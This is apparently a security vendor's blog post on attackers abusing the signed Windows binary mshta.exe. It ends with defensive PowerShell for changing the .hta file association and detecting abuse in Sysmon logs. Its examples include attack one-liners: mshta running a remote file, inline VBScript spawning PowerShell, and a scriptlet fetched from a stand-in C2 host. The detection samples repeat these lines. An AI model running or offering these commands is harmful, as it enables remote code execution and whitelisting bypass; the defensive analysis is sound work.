The not-so Usual Suspects

There is a growing trend for attackers to more heavily utilize tools that already exist on a system rather than relying totally on their own custom malware.


Using .hta files or their partner in crime, mshta.exe, is an alternative to using macro-enabled documents for attacks and has been around a long time. It is a tool so flexible it even has its own cell on the MITRE ATT&CK matrix.

What Makes Mshta Dangerous?

To start, it is a signed, native Microsoft binary that already exists on Windows and can execute code in a variety of ways. In today's living-off-the-land culture that attackers love, this makes it a prime application of interest, since code execution can be proxied through it.

Mshta.exe can also be used to bypass application whitelisting defenses and browser security settings.

These types of binaries have been colloquially dubbed "LOLBINs" but more formally have been turned into techniques within the MITRE tactic of Execution: techniques T1218 and T1216, Signed Binary Proxy Execution and Signed Script Proxy Execution, respectively.[1]

How It Is Used:

The most interesting abuse of native Windows binaries is the ability to run a program that will either execute passed-in code or execute a payload hosted remotely. This was quite popular with Casey Smith's squiblydoo and squiblytwo attacks, where regsvr32 and wmic (also considered LOLBINs) were both found to be signed Windows binaries able to execute code hosted remotely.

Example 1: A remote file being executed:

mshta.exe http<:>//

Example 2: Mshta used to execute inline JScript/VBScript.

Note: this syntax only works in cmd and will give an error if executed in PowerShell.

mshta vbscript:(CreateObject("WS"+"C"+"rI"+"Pt.ShEll")).Run("powershell",1,True)(window.close)

Example 3: Calling a public method named Exec in a COM scriptlet with JavaScript:

mshta javascript:a=GetObject("script:http://c2<.>com/cmd.sct").Exec()

Source:

Note: notice the similarities between the usage of mshta with the Exec method and the corresponding use in regsvr32 in the above gist.

Alternatively, a file with a .hta extension can just as easily be double-clicked by the user, where the code is set to autorun on open, much like a macro-enabled document.

Availability in Public Tools

There is no shortage of easily accessible repos to help someone quickly generate a payload that uses mshta. .hta file generation is available in nearly all public red-teaming tools such as Empire, Metasploit, Unicorn, and Koadic.


Do not forget, however, that mshta's use is not limited to .hta files. It can also call code registered inside of COM scriptlets (.sct), so it is relevant to other tools such as GreatSCT.

It's also worth noting that even if you have powershell.exe blocked, tools like nps payload have .hta files that dynamically build a project and compile it with msbuild (another tool to be wary of) to create a tool that can execute PowerShell commands without using powershell.exe at all.

In The Wild:

One of my favorite tools to look for examples is an interactive online sandbox, which is a great resource for finding new samples. You can even filter by MITRE ATT&CK technique, which is what I did here:


As you can see, there is no shortage of samples to go through. Another interesting detail is that we can see several different file extensions used outside of the standard .hta, and even some where the sandbox has found no threats detected. Is that true though?


Here we can see it has the dubious name windows-update.hta and is running from a temp folder. This looks to be a binary embedded within an .hta file to trick automated sandbox detection.

Here we look at another sample with no threats detected.


sha256: 0ab797e7546eaf7bf40971a1f5f979355ed77a16124ae749ef1e90b81e4a3f88

We see multiple file extensions used in the name to try and fool users into thinking it is a picture. The script appears to be using WMI to spawn a new process, which breaks the "expected" process chain of mshta > PowerShell and can allow malware to bypass rules that look for a direct process relationship such as Word > PowerShell.

We can also see the sandbox believes this is not malicious based on its scoring. Luckily, we can look at the PowerShell code that it spawns and get a better idea.


Process tree for 0ab797e7546eaf7bf40971a1f5f979355ed77a16124ae749ef1e90b81e4a3f88

So, mshta can also be used to execute VBScript and WMI to break the process tree chain and launch PowerShell.

And in the below example you can see mshta's role in continuing part of an infection chain in common malware.


Use of an exploit, then mshta executing remote code that spawns the rest of the infection chain

Protection and Recommendations

One of the easiest things you can implement is to change the default application for files with an .hta extension from mshta.exe to a plain text editor such as Notepad, to help keep users from unwittingly double-clicking a malicious .hta attachment.
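The following is an added example (not code from the original post) that audits and, if you choose, repoints the .hta file association described above. It assumes the standard registry locations for the htafile ProgId, HKLM\SOFTWARE\Classes\htafile\shell\open\command (machine-wide) and the per-user counterpart under HKCU, which takes precedence when it exists; the function names are hypothetical.

```powershell
# Added example, not from the original post. Audits which command Windows runs
# when a .hta file is double-clicked and optionally repoints it to notepad.exe.
# Assumption: the .hta extension maps to the 'htafile' ProgId (the Windows default).

$HtaOpenCommandPaths = @(
    'HKCU:\SOFTWARE\Classes\htafile\shell\open\command',   # per-user override, wins if present
    'HKLM:\SOFTWARE\Classes\htafile\shell\open\command'    # machine-wide default
)

function Get-HtaHandler {
    # Returns the open command registered in each hive that defines one
    foreach ($p in $HtaOpenCommandPaths) {
        if (Test-Path $p) {
            [pscustomobject]@{
                Path    = $p
                Command = (Get-ItemProperty -Path $p).'(default)'
            }
        }
    }
}

function Set-HtaHandlerToNotepad {
    # Writes "C:\Windows\System32\notepad.exe" "%1" into both hives so no
    # per-user value can silently restore mshta.exe. HKLM needs an elevated shell.
    $notepad = Join-Path $env:SystemRoot 'System32\notepad.exe'
    $cmd = "`"$notepad`" `"%1`""
    foreach ($p in $HtaOpenCommandPaths) {
        if (-not (Test-Path $p)) { New-Item -Path $p -Force | Out-Null }
        Set-ItemProperty -Path $p -Name '(default)' -Value $cmd
    }
}

# Audit first; flag any hive that still hands .hta files to mshta.exe
Get-HtaHandler | Format-Table -AutoSize
Get-HtaHandler | Where-Object { $_.Command -match 'mshta' } |
    ForEach-Object { Write-Warning "$($_.Path) still launches mshta.exe for .hta files" }

# Set-HtaHandlerToNotepad   # uncomment to apply the change
```

After applying, `ftype htafile` from a cmd prompt should show the notepad.exe command. Keep in mind this only changes what a double-click does: mshta.exe itself still runs when invoked directly with an inline `vbscript:`/`javascript:` argument or a URL, which is why the post's later advice about blocking or inventorying mshta.exe still applies.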

If you are a customer, Endpoint Security (ENS) provides rules 322, which is now enabled by default, and 324, which can be enabled in ePO, to help protect your environment against malicious mshta abuse.[2]

You should also spend some time exploring where abusable native binaries like mshta.exe are used in your environment. If there are no business needs that require it, blocking it outright is advised. If it is required, understand where and why, so you can find the systems running things like mshta.exe that aren't expected to be.
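As an added example (not code from the original post), the script below inventories mshta.exe process creations and flags the patterns this post discusses: inline `vbscript:`/`javascript:` arguments (Examples 2 and 3), remote URLs (Example 1), .hta files launched from temp or user paths, PowerShell spawned directly by mshta, and the WMI-spawned PowerShell that breaks the expected mshta > PowerShell chain. It assumes Sysmon Event ID 1 field names (Image, ParentImage, CommandLine); the sample records are constructed, and the function names are hypothetical.

```powershell
# Added example, not from the original post. Scores process-creation records
# for the mshta abuse patterns described above. Assumes Sysmon-style fields.

function Test-MshtaAbuse {
    param([Parameter(Mandatory)] $Record)   # object with Image, ParentImage, CommandLine
    $reasons = @()
    $image  = [System.IO.Path]::GetFileName("$($Record.Image)").ToLower()
    $parent = [System.IO.Path]::GetFileName("$($Record.ParentImage)").ToLower()
    $cmd    = "$($Record.CommandLine)".ToLower()

    if ($image -eq 'mshta.exe') {
        # Inline script handed to mshta on the command line (post's Examples 2 and 3)
        if ($cmd -match '\b(javascript|vbscript):') { $reasons += 'inline script protocol in command line' }
        # Payload or .sct scriptlet hosted remotely (post's Example 1)
        if ($cmd -match 'https?://')                { $reasons += 'remote URL in command line' }
        # Double-clicked .hta living in a temp/user-writable path
        if ($cmd -match '\\(temp|downloads|appdata)\\.*\.hta') { $reasons += '.hta run from temp/user path' }
        # Anything else is still worth inventorying if mshta has no business need
        if ($reasons.Count -eq 0) { $reasons += 'mshta execution (inventory)' }
    }
    # The "expected" chain: mshta > PowerShell
    if ($image -match '^(powershell|pwsh|cmd)\.exe$' -and $parent -eq 'mshta.exe') {
        $reasons += 'script host spawned directly by mshta'
    }
    # Chain broken via WMI: the script host's parent is the WMI provider host instead
    if ($image -match '^(powershell|pwsh|cmd)\.exe$' -and $parent -eq 'wmiprvse.exe') {
        $reasons += 'script host spawned via WMI (process chain broken)'
    }
    [pscustomobject]@{ Image = $image; Parent = $parent; Reasons = $reasons }
}

function ConvertFrom-SysmonEvent {
    # Flattens a Get-WinEvent record's EventData into an object with named fields
    param([Parameter(Mandatory)] $WinEvent)
    $x = [xml]$WinEvent.ToXml()
    $h = @{}
    foreach ($d in $x.Event.EventData.Data) { $h[$d.Name] = $d.'#text' }
    [pscustomobject]$h
}

# Constructed sample records (not real telemetry); URLs are defanged
$samples = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = '"C:\Windows\System32\mshta.exe" "C:\Users\u\AppData\Local\Temp\windows-update.hta"' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'mshta vbscript:(CreateObject("WScript.Shell")).Run("powershell",1,True)(window.close)' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'; ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'mshta javascript:a=GetObject("script:http://c2[.]com/cmd.sct").Exec()' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'; CommandLine = 'powershell -enc AAAA' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\notepad.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'notepad.exe readme.txt' }
)

$samples | ForEach-Object { Test-MshtaAbuse $_ } |
    Where-Object { $_.Reasons.Count -gt 0 } |
    Format-Table -AutoSize -Wrap

# Against live Sysmon telemetry (Event ID 1 = process creation):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#     ForEach-Object { Test-MshtaAbuse (ConvertFrom-SysmonEvent $_) } |
#     Where-Object { $_.Reasons.Count -gt 0 }
```

Running the sample set, the four mshta/WMI records are reported with their reasons and the notepad record is dropped. The WmiPrvSE.exe check is the part worth keeping even after you have blocked mshta.exe: it catches the broken-chain case from the windows-update.hta sample regardless of which LOLBIN issued the WMI call, so the hit rate on it should be reviewed against legitimate WMI-driven management in your environment before alerting on it.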


For more insights and tips like these, subscribe to this blog or check out the latest threats from our Threat Center.
